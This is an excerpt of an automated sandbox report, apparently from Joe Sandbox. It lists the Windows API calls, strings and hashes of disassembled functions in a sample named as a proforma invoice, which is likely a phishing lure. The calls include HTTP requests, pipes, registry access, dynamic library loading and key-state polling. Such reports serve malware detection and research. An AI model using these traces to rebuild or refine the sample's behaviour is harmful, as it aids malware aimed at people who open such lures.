                                                                                                                    • Instruction Fuzzy Hash: 34319275924215ABCF00EF54CC51EAEB3B5FF04720B108769E869976D1DB71A91ACF80
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002AAA99: GetClassNameW.USER32(?,?,000000FF), ref: 002AAABC
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 002A8F14
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 002A8F27
                                                                                                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 002A8F57
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 365058703-1403004172
                                                                                                                    • Opcode ID: eb1127ee20e527d3a4521c4d4dd793449b9216eb308d82da34b35728d2709bee
                                                                                                                    • Instruction ID: f5fab413a3bd4a12ca4f93d44383badaae8179ad008c07ace22552a4cf6c7056
                                                                                                                    • Opcode Fuzzy Hash: eb1127ee20e527d3a4521c4d4dd793449b9216eb308d82da34b35728d2709bee
                                                                                                                    • Instruction Fuzzy Hash: D321E171A21105BFDB14ABB09C8A9FEB779DF06320B148119F825961E1DF3948299A50
                                                                                                                    APIs
                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002C1872
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 002C18A2
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002C18E9
                                                                                                                      • Part of subcall function 002C2483: GetLastError.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C2498
                                                                                                                      • Part of subcall function 002C2483: SetEvent.KERNEL32(?,?,002C1817,00000000,00000000,00000001), ref: 002C24AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
                                                                                                                    • Instruction ID: 200adb6dc825c2d7f2230a271585d566d84e361904ba53ea620bb030c73ae1ac
                                                                                                                    • Opcode Fuzzy Hash: af3fa99f19a4ecb680d7da9ba22bfff9cfef2fa7590fa420c5111c36e1828a46
                                                                                                                    • Instruction Fuzzy Hash: 6521AFB1524209BFFB11AF609C86FBB77ADEF49744F10422EF90592141DA609D245BA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
                                                                                                                      • Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
                                                                                                                      • Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91
                                                                                                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 002D6461
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 002D6468
                                                                                                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 002D647D
                                                                                                                    • DestroyWindow.USER32(?), ref: 002D6485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
                                                                                                                    • Instruction ID: 47555ba1cf7e170563cdc386745c89d240dbcf5946916d4999ef2c564af3257a
                                                                                                                    • Opcode Fuzzy Hash: 0ceeef769ffced74df1cfc14ca759395e10eef0a76036c29ed49f2e5a3c8f2c3
                                                                                                                    • Instruction Fuzzy Hash: 4F218E71120206AFEF204F64DC48EBB37ADEB58764F10862AF95092290D771DC619B60
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002B6DBC
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6DEF
                                                                                                                    • GetStdHandle.KERNEL32(0000000C), ref: 002B6E01
                                                                                                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 002B6E3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
                                                                                                                    • Instruction ID: bd1ca146b994a6d57a86179c6483cf6056172b9d5f4e8e2014ef60f460b50b40
                                                                                                                    • Opcode Fuzzy Hash: a90a621793c085cf78d2a6b5222af4d0f33fa7b59c0e2c5d1b4390a3c35fd70c
                                                                                                                    • Instruction Fuzzy Hash: AE21817561020BABDB209F29DC0CADA7BA4EF45760F204A2AFCA1D72D0D7749D608B54
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002B6E89
                                                                                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 002B6EBB
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 002B6ECC
                                                                                                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 002B6F06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHandle$FilePipe
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 4209266947-2873401336
                                                                                                                    • Opcode ID: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
                                                                                                                    • Instruction ID: 3f62396de48fedf8088d5c5bae17191615b77370f765c72878aefd1df5423eae
                                                                                                                    • Opcode Fuzzy Hash: 4079d17c9db9d8457e38be6e403ba3b64e31fedaef6c312a7e137df1e9e829a2
                                                                                                                    • Instruction Fuzzy Hash: DD2190799103069BDB209F69DC0CEEA77A8EF457A0F200A1AFDA1D72D0D774E8608B54
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002BAC54
                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 002BACA8
                                                                                                                    • __swprintf.LIBCMT ref: 002BACC1
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,002DF910), ref: 002BACFF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                    • String ID: %lu
                                                                                                                    • API String ID: 3164766367-685833217
                                                                                                                    • Opcode ID: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
                                                                                                                    • Instruction ID: db1cf26005adb8e832fa28e46dbf0c4c95d3f6dd76aa410a2f891878d026fa15
                                                                                                                    • Opcode Fuzzy Hash: 2fc4abc03e13f51017a51fdb21edda7218ebc9c90646dab0d42e9102c4af1670
                                                                                                                    • Instruction Fuzzy Hash: FE216D70A10209AFCB10EF64DD45DEEBBB8EF49715B0040A9F909AB251DA31EE55CF61
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B115F
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B1184
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B118E
                                                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,002AFCED,?,002B0D40,?,00008000), ref: 002B11C1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                                                    • String ID: @+
                                                                                                                    • API String ID: 2875609808-2529809375
                                                                                                                    • Opcode ID: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
                                                                                                                    • Instruction ID: 8504e2ad2372c729303ed0cbe9391450e9a14e876e99d66e6d9368c410220071
                                                                                                                    • Opcode Fuzzy Hash: f80f05852c65f0eb7745716b9f708dec13035ce7f9fd0bc4ddd509fe9cc9393a
                                                                                                                    • Instruction Fuzzy Hash: A4118231C2151DE7CF00DFA8D9586EEBB78FF09751F404056DA49B6240CB709970DBA5
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 002B1B19
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
                                                                                                                    • Instruction ID: 6c8803aa938f49dcb846d1de315c516a9df7063b6c14dbbd8389adcbf0175a6c
                                                                                                                    • Opcode Fuzzy Hash: a0507e44e5e09046815aa64716704f9b95ab21b41a92e91e2a93d74303c79b6e
                                                                                                                    • Instruction Fuzzy Hash: 28117C349212098BCF00EF54D8A28EEB3B4BF26708F508465D85467691EB325D2ACF40
                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002CEC07
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002CEC37
                                                                                                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002CED6A
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 002CEDEB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2364364464-0
                                                                                                                    • Opcode ID: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
                                                                                                                    • Instruction ID: 553c1e6765c1001af91ec33da1ed587827f9abe4617af3418861914004e3ed45
                                                                                                                    • Opcode Fuzzy Hash: 680f1eec6f4ca753498a6501858f37085e40fbf21dee764c3d7b76dcf0ecb607
                                                                                                                    • Instruction Fuzzy Hash: FE8191716103019FDB60EF28C846F2AB7E5AF44710F05891DF99ADB292DBB0AC54CF56
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1559183368-0
                                                                                                                    • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                    • Instruction ID: 1b673af7f11bd7ac35374ad8c73e5f637c4a9c2f140a51301c912119ef1e71f1
                                                                                                                    • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                                                                    • Instruction Fuzzy Hash: FA51CA70A20B26DBDB249F65D84056EF7A6AF40321F54C729F82D962D0D7F09D748F41
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                      • Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D00FD
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D013C
                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002D0183
                                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 002D01AF
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002D01BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3440857362-0
                                                                                                                    • Opcode ID: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
                                                                                                                    • Instruction ID: 5d5dfcb40fa20d96d6784237713f3b1d156f67e8d58fc48e0d33e4de07ebed40
                                                                                                                    • Opcode Fuzzy Hash: 25cfa5fa8c148a92661a7c5df06b7ed09946c43456a4e6e573e9d0e5548406e6
                                                                                                                    • Instruction Fuzzy Hash: D8515C71628204AFC704EF68D885F6AB7E8BF84304F44491EF959872A1DB31ED18CF56
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CD927
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002CD9AA
                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 002CD9C6
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 002CDA07
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 002CDA21
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327935632-0
                                                                                                                    • Opcode ID: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
                                                                                                                    • Instruction ID: 35e59bf6383d11906fa28a578fd7e3795dbb9726fc7cc40483d462537e510454
                                                                                                                    • Opcode Fuzzy Hash: 5c48fcc2941385332d55b24576dffee668221c2fabe9e100ae71bfa976792cb6
                                                                                                                    • Instruction Fuzzy Hash: E3512875A10206DFCB00EFA8C494EADB7F4EF09314B148169E81AAB322D730ED55CF94
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002BE61F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002BE648
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002BE687
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002BE6AC
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002BE6B4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1389676194-0
                                                                                                                    • Opcode ID: 1b332b7b6d8eef99fcb9c334a20cea59b5a3180293c7c09ce6434df362675733
                                                                                                                    • Instruction ID: b1f4cd98f40c58799a43663be9090c73c7aa8a3d55a3c1bad13794f41771a813
                                                                                                                    • Opcode Fuzzy Hash: 1b332b7b6d8eef99fcb9c334a20cea59b5a3180293c7c09ce6434df362675733
                                                                                                                    • Instruction Fuzzy Hash: 42513935A10605DFCB00EF64C9859AEBBF5EF09314B1480A9EC09AB361CB31ED64DF54
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
                                                                                                                    • Instruction ID: dd23e410533fcda390f7f31cfba434736b8f2e1545d0f5fd6b87e1f09a960188
                                                                                                                    • Opcode Fuzzy Hash: ccbf70aaf1d7574b896239263e4d6b69822f8b04f1dd723286e89f0a808a6a36
                                                                                                                    • Instruction Fuzzy Hash: 3A41D235925105AFD720DF28DC49FA9BBA8EB09311F144267F81AA73E0C770ED61DA51
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 00252357
                                                                                                                    • ScreenToClient.USER32(003157B0,?), ref: 00252374
                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00252399
                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 002523A7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
